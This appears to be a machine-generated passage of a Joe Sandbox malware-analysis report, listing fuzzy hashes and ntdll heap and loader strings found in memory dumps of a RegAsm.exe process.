                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                        • API String ID: 0-2586055223
                                                        • Opcode ID: 236c135865f3224269737a27b039133439e9f0cb9593272082e10acadeaf49be
                                                        • Instruction ID: a207663c80f98d16542cf117a35712cf1485f6b75f4108b700016257e842207e
                                                        • Opcode Fuzzy Hash: 236c135865f3224269737a27b039133439e9f0cb9593272082e10acadeaf49be
                                                        • Instruction Fuzzy Hash: F7611232284680AFD721DB24D844F67B7EAEF84718F098469FA958B791DB34DD00CB65
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                        • API String ID: 0-336120773
                                                        • Opcode ID: 0a5c67dbc65b1b9f36122e3a6797c014cd262591100f270879d6c48f1e71f1d9
                                                        • Instruction ID: ddd29bc7ae6ef3dd650708c00019c572ed9a8fa99167ee5f3c21005bdb82bca3
                                                        • Opcode Fuzzy Hash: 0a5c67dbc65b1b9f36122e3a6797c014cd262591100f270879d6c48f1e71f1d9
                                                        • Instruction Fuzzy Hash: 6C31E032680500EFE712DB98E895FA777E9EF08728F159455F90DCF290D7209D44EE64
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                        • API String ID: 0-1391187441
                                                        • Opcode ID: bb22403f89435a7b079428aa57295e912e44016401a61869ff2d2290e75dcc4c
                                                        • Instruction ID: f8fe1c8d0e40d102e34eea0bd4abaf45cfb99761a06c9b149ad5f3a84e12f7d2
                                                        • Opcode Fuzzy Hash: bb22403f89435a7b079428aa57295e912e44016401a61869ff2d2290e75dcc4c
                                                        • Instruction Fuzzy Hash: 62310132A00114EFEB41DB44D884FEAB7B9EF44728F158066FE11AB391D770ED44CA24
                                                        Strings
                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 02E1327D
                                                        • HEAP[%wZ]: , xrefs: 02E13255
                                                        • HEAP: , xrefs: 02E13264
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                        • API String ID: 0-617086771
                                                        • Opcode ID: 35e92daeb973c402c5e439e86a3eab72c50bc7b5ca8f619f8ecfadc0813b9d93
                                                        • Instruction ID: 124cf084854432d553cfa950e2586b57c8ca55c00c1556a555fde31724c3715d
                                                        • Opcode Fuzzy Hash: 35e92daeb973c402c5e439e86a3eab72c50bc7b5ca8f619f8ecfadc0813b9d93
                                                        • Instruction Fuzzy Hash: 0E92BC70A442589FDB25CF68C840BAEBBF1FF48308F14D0A9E95AAB391D734A945CF50
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 066c9f895700768149c85ea8dc06a22aff0d1c2f1290ed84c260402452a8b974
                                                        • Instruction ID: ebea97dab31662f7c3c8b12cd5d2bf9f983a5b08d866a49ac5b8f7fb2008dcbf
                                                        • Opcode Fuzzy Hash: 066c9f895700768149c85ea8dc06a22aff0d1c2f1290ed84c260402452a8b974
                                                        • Instruction Fuzzy Hash: 4D2221706806419FEB24CF28C898B7ABBF6FF05708F14C5A9E9458B382D735D881CB60
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $ $0
                                                        • API String ID: 0-3352262554
                                                        • Opcode ID: 3bbc31e728c01de9173e2033a1c3fa3184d2f1bc86af3d636cac10593994b739
                                                        • Instruction ID: 438c2432e1203d0600207a90fb93eaae94c82cc6777672e5befeb7228f2a30b2
                                                        • Opcode Fuzzy Hash: 3bbc31e728c01de9173e2033a1c3fa3184d2f1bc86af3d636cac10593994b739
                                                        • Instruction Fuzzy Hash: AF3224B16483818FD320CF68C494B9BBBE5BF88308F14992DF5998B252D775E948CB52
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        Strings
                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02E01728
                                                        • HEAP[%wZ]: , xrefs: 02E01712
                                                        • HEAP: , xrefs: 02E01596
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $@
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %$&$@
                                                        Strings
                                                        • TargetNtPath, xrefs: 02EDB82F
                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 02EDB82A
                                                        • GlobalizationUserSettings, xrefs: 02EDB834
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                        Strings
                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02E5E6C6
                                                        • HEAP[%wZ]: , xrefs: 02E5E6A6
                                                        • HEAP: , xrefs: 02E5E6B3
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 02EADC12
                                                        • HEAP: , xrefs: 02EADC1F
                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 02EADC32
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 02E782E8
                                                        • Failed to reallocate the system dirs string !, xrefs: 02E782D7
                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 02E782DE
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 02E71B39
                                                        • minkernel\ntdll\ldrtls.c, xrefs: 02E71B4A
                                                        • LdrpAllocateTls, xrefs: 02E71B40
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                        Strings
                                                        • @, xrefs: 02EBC1F1
                                                        • PreferredUILanguages, xrefs: 02EBC212
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02EBC1C5
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                        Strings
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02E84888
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 02E84899
                                                        • LdrpCheckRedirection, xrefs: 02E8488F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        Strings
                                                        • Actx , xrefs: 02E333AC
                                                        • RtlCreateActivationContext, xrefs: 02E729F9
                                                        • SXS: %s() passed the empty activation context data, xrefs: 02E729FE
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                        Strings
                                                        • minkernel\ntdll\ldrtls.c, xrefs: 02E71A51
                                                        • LdrpInitializeTls, xrefs: 02E71A47
                                                        • DLL "%wZ" has TLS information at %p, xrefs: 02E71A40
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                        Strings
                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 02E4127B
                                                        • BuildLabEx, xrefs: 02E4130F
                                                        • @, xrefs: 02E412A5
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 02E82104
                                                        • LdrpInitializationFailure, xrefs: 02E820FA
                                                        • Process initialization failed with status 0x%08lx, xrefs: 02E820F3
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: #%u
                                                        • API String ID: 48624451-232158463
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@
                                                        • API String ID: 0-149943524
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `$`
                                                        • API String ID: 0-197956300
                                                        Strings
                                                        • ResIdCount less than 2., xrefs: 02E5EEC9
                                                        • Failed to retrieve service checksum., xrefs: 02E5EE56
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                        • API String ID: 0-863616075
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F[L$gfff
                                                        • API String ID: 0-2389936153
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: gfff$o
                                                        • API String ID: 0-108857820
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: R$gfff
                                                        • API String ID: 0-3105419775
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: R$gfff
                                                        • API String ID: 0-3105419775
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: U$o
                                                        • API String ID: 0-364442972
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$$
                                                        • API String ID: 0-233714265
                                                        Strings
                                                        • kLsE, xrefs: 02E00540
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 02E0063D
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                        • API String ID: 0-2547482624
                                                        Strings
                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 02E0A2FB
                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 02E0A309
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                        • API String ID: 0-2876891731
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local\$@
                                                        • API String ID: 0-380025441
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MUI
                                                        • API String ID: 0-1339004836
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: P`owRbow
                                                        • API String ID: 0-263301770
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (
                                                        • API String ID: 0-3887548279
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (
                                                        • API String ID: 0-3887548279
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PATH
                                                        • API String ID: 0-1036084923
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalTags
                                                        • API String ID: 0-1106856819
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: gfff
                                                        • API String ID: 0-1553575800
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: EXT-
                                                        • API String ID: 0-1948896318
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PreferredUILanguages
                                                        • API String ID: 0-1884656846
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryHash
                                                        • API String ID: 0-2202222882
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: verifier.dll
                                                        • API String ID: 0-3265496382
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: kLsE
                                                        • API String ID: 0-3058123920
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Flst
                                                        • API String ID: 0-2374792617
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx
                                                        • API String ID: 0-89312691
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -\P
                                                        • API String ID: 0-1722783593
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Memory Dump Source
